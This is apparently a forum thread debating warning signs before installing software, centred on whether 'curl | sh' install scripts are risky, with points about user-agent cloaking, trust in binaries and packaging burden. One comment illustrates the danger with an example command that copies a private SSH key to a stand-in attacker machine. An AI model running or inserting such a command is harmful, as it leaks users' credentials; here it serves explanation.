Have you ever found a GitHub project or anything that seemed nice and tempting to install until you dug a bit deeper?
What are some red flags that should detur anyone from installing and running something?
Have you ever found a GitHub project or anything that seemed nice and tempting to install until you dug a bit deeper?
What are some red flags that should detur anyone from installing and running something?
curl | shinstallation methodBack in the Python 2.7 days,
curl | grep shwas the standard practice for installing the package manager, pip. Even better, the shell script actually had a binary blob somewhere in the middle. It was shell script up top, binary blob in the middle, and back to shell script at the bottom. Until Python 3.5ish, pip wasn’t bundled with Python, so this was standard practice.Noob here, what’s wrong with curl | sh installs?
The real answer is that user-agents can be used to show you one version in your browser and then serve you another one with curl.
I say “real” because all the idiots talking about “don’t run scripts from the internet!!!” probably forget they don’t decompile every binary they run. E.g. the rustup installer (the tool for managing Rust toolchains) is by default a curl+bash one liner. Why would I worry about them serving me a wrong script when I’m any way about to run their binary blob?
If you have any doubt about the hosting service (which might or not be the same as the software author!) then avoid piping into bash, but then why would you run their code at all if you distrust them so much? Do you expect github to install a keylogger? Probably not. Some telemetry hook to know whose running the requested script? Possibly someday
Let’s say you curl bash something and it has ie ‘scp ~/.ssh/id_ed25519 badComputerGuy’ in it then you just uploaded your private key to the bad guys. And that’s why ssh keys should be password protected
“Download this shell script from the web and execute it right away.”
Probably close to 80% of the words in the sentence are wrong.
As others have said, you are boldly trusting that the script you’re downloading is safe. ALWAYS examine a script before you pipe to bash. Also, open the script in your browser, the copy paste j to your terminal. It’s entirely possible to change the script based on use agent to display differently when your check in your browser versus when you pipe to bash
In THEORY they’re bad because the script could do malicious things and you shouldn’t blindly trust random people on the internet telling you what to execute.
In practice it’s mostly fearmongering because you’re likely trying to install a binary that could do malicious things anyways. “Mostly” because it is a bit less safe as one could MITM the script more easily or something, but not really by that much.
You shouldn’t run
curl | shscripts some random person sends you, but running an official script prom an official source is no more dangerous than running a .Deb file from that same source.It forces you to blindly trust that whatever script curl will download is save to run and does exactly what you want / was promised as it will be executed right away.
It’s annoying that the Proxmox helper scripts are all curl | sh based.
Some mature projects still do curl .sh, like pivpn and pihole.
which makes sense because they don’t maintain packages on the dozens of different package manager repos.
IMO it’s kind of bogus to knock a project for having a shell install file.
Eh, I’d be more sympathetic if there weren’t a dozen different alternatives to making this exclusively how people install your software.
It’s a virus delivery system waiting to happen. Especially now when you have AI that can help you stand up an imposter site quickly and easily.
If it’s not open source or you are not compiling it:
Why so much fear about the shell script but no fear from the executable?
If it’s open source and you are compiling it:
If you don’t fear the project because you (presumably) have read the source code and determined that it’s fine, why fear a shell script that is most certainly simpler, and you can read it like the rest of the code?
Huh? Fear from both.
If you fear both, and
curl | shis a red flag. Binary blob is also a red flag, if you fear them both equally.Has every software that runs in your computer been compiled by you?
No, but much of it comes from software repositories, which is exactly the point.
it’s not the impact to the user having dozens of choices.
it’s the impact to the developer to having to maintain the packages for dozens of package repo admins that have each their own special requirements for packages that have to be followed. it’s a huge pita that most companies don’t even bother with and just run their own package repo.
IMO the user isn’t blameless when using an install script. anyone who just blindly runs arbitrary code without reading it is a fool asking to be attacked.
Exactly, it’s a shift in responsibilities from the developers of a thing to the users of that thing.
As a grunt at work and a mid-tier “money haver” at best, I’m tired of having everything shift its costs onto me and it’s a red flag that prevents me from installing and running a software package.
Everything around nowadays does this shift if they can get away with it.
I have to set limits on what I tolerate to achieve what gain or the world will leave me dead with a giant tire mark across my chest.
as a foss dev, your problems aren’t my problems.
As a sporadic foss contributor and foss advocate, I ain’t even installing your shit if the only install option is curl pipe to shell.
And I also do think it’s a red flag exactly like the original poster was looking for.
if you’re dumb enough to pipe curl to bash you deserve everything you get.
rtfs